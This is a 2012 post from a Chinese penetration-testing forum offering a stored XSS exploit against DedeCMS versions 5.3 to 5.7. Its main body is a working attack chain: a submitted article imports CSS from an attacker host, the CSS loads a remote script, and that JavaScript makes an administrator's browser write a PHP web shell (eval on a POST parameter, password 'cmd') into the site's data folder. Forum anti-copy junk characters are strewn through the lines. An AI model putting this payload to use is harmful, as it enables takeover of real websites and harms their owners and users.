找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
返回列表 发新帖
查看: 2267|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
# j. |4 K1 s5 j2 q! M为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
: ~3 g" h# }# Q5 Q; n目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。
* z/ s" @9 |+ e; F+ G下面说说利用方法。- G3 g( S, c! B2 V0 F! q6 Y( I! D. E' ]
条件有2个:
: ^& O( m7 Z4 r( F8 [+ u1.开启注册
* {% L3 u, e' }% G7 P! P: t. J2.开启投稿
5 x; |" x2 h6 m. r. W* Z3 ~1 }- L注册会员----发表文章
7 R; C; |2 D4 |, x内容填写:
* J+ M9 y! C3 H7 w9 R  S. H  }复制代码) t* m9 f) }1 a6 z1 F; `0 E4 b( a
<style>@im\port'\http://xxx.com/xss.css';</style>
, g7 X, m; X* ~5 \  ~新建XSS.Css
% E$ E" D) [5 m6 [复制代码
' K8 C% i2 I! l1 x.body{9 f; M" G/ |2 ]# I) I  h
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }; N1 g1 P- v  d% ?/ D/ n
新建xss.js 内容为1 E2 h2 T- R- o$ E- K. M
复制代码
6 V" Q7 B% f9 G! s* @1 Y1 y7 H  R5 Y1.var request = false;
0 n+ l" C1 Y! @' v2 M7 j2.if(window.XMLHttpRequest) {8 b" c) N7 p" ?9 C# e
3.request = new XMLHttpRequest();
3 z" o: a$ Y1 Y! J8 Q/ H  b4.if(request.overrideMimeType) {
1 U9 d* M4 Z1 E+ a5.request.overrideMimeType('text/xml');
. f4 Z2 G! F* W( v& |4 I6.}' J4 h  }* `0 t  F* X9 W
7.} else if(window.ActiveXObject) {' E  v/ K8 u* a  r+ a
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];, w- m3 h9 p. w# b
9.for(var i=0; i<versions.length; i++) {- w. r6 T' Q& H6 @
10.try {
) f! t* r" S* D$ r, d11.request = new ActiveXObject(versions);8 [  j% j) P1 U+ L8 o
12.} catch(e) {}
, v( A7 ]3 X$ g. Q5 Z; _' U13.}
% X- h% Q* W# j5 y7 E14.}& X& s7 A+ a) z1 A
15.xmlhttp=request;
" S( [/ Y9 y/ W! B16.function getFolder( url ){2 ~) l, a/ P! Z6 X- Q( Y
17. obj = url.split('/')
8 c* W& Z: E1 c. e18. return obj[obj.length-2]
/ x5 R1 v! ~2 Z19.}
1 [5 R9 s. e9 W6 C/ j) d20.oUrl = top.location.href;
7 M  x  ^! T$ H21.u = getFolder(oUrl);
: d% B+ a$ V, [+ W+ r" t" ]22.add_admin();) o( {5 j# o5 Y& M
23.function add_admin(){9 R4 M( Q1 A: g  E* g7 A
24.var url= "/"+u+"/sys_sql_query.php";0 B( D% C6 b( d4 J. R, j' ?: N
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
8 f. D0 X% p% z4 L5 ~% C% l; b26.xmlhttp.open("POST", url, true);& @7 M: M0 q9 q
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");% \' u4 n5 y7 D( p1 T
28.xmlhttp.setRequestHeader("Content-length", params.length);
: I1 K: d5 i, c29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");/ X% t6 b2 w) V3 f2 [$ ~! J; c
30.xmlhttp.send(params);! Z; L2 m  V+ U3 c) H& z
31.}4 B1 u% @4 T! i4 z  ?
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表